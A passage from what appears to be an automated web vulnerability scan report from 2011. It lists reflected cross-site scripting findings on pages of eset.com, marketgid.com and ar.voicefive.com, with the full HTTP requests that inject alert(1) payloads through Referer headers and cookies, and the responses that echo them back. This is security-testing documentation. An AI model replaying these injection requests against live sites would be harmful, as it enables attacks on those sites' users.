Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=7c73f"-alert(1)-"f9f42456929

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21125
Date: Mon, 25 Apr 2011 12:53:27 GMT
X-Varnish: 1310966651
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=7c73f"-alert(1)-"f9f42456929";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
6.75. http://www.eset.com/us/business/server-security/linux-file [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/server-security/linux-file

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95bca"-alert(1)-"1b87eb369cb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=95bca"-alert(1)-"1b87eb369cb
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17267
Date: Mon, 25 Apr 2011 12:59:23 GMT
X-Varnish: 1310979390
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=95bca"-alert(1)-"1b87eb369cb";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
6.76. http://www.eset.com/us/home/smart-security [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec105"-alert(1)-"6412896c31 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=ec105"-alert(1)-"6412896c31
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25525
Date: Mon, 25 Apr 2011 15:18:50 GMT
X-Varnish: 555659225
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=ec105"-alert(1)-"6412896c31";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
6.77. http://www.eset.com/us/store [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b284d"-alert(1)-"70192e64f96 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b284d"-alert(1)-"70192e64f96
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38902
Date: Mon, 25 Apr 2011 12:59:41 GMT
X-Varnish: 1310980199
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=b284d"-alert(1)-"70192e64f96";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
6.78. http://www.eset.com/us/styles/store-new.css [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/styles/store-new.css

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47973"-alert(1)-"4198eb1d78a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=47973"-alert(1)-"4198eb1d78a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 13:02:15 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Mon, 25 Apr 2011 13:02:15 GMT
X-Varnish: 1310986158
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=47973"-alert(1)-"4198eb1d78a";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
6.79. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 8efb9<script>alert(1)</script>2ae95f37538 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935
Referer: http://www.google.com/search?hl=en&q=8efb9<script>alert(1)</script>2ae95f37538

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:33:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: CookiePNewsPage=1; path=/; expires=Tue, 26-Apr-2011 14:33:37 GMT
Cache-Control: no-cache, must-revalidate
Content-Length: 48806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="mgnvgfd5yref" style="display:none">http://www.google.com/search?hl=en&q=8efb9<script>alert(1)</script>2ae95f37538</div>
...[SNIP]...
6.80. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1146c<script>alert(1)</script>154e165be29 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=11146c<script>alert(1)</script>154e165be29; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:36:17 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25227

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941023",Location:
...[SNIP]...
81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '11146c<script>alert(1)</script>154e165be29', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...
6.81. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 384b1<script>alert(1)</script>9c302d4a2ba was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C384b1<script>alert(1)</script>9c302d4a2ba

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:36:21 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25227

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941023",Location:
...[SNIP]...
={ "ar_p97174789": 'exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C384b1<script>alert(1)</script>9c302d4a2ba', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "B
...[SNIP]...
6.82. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f1285<script>alert(1)</script>7568065879e was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046f1285<script>alert(1)</script>7568065879e

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:32 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:32 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:32 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741412; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
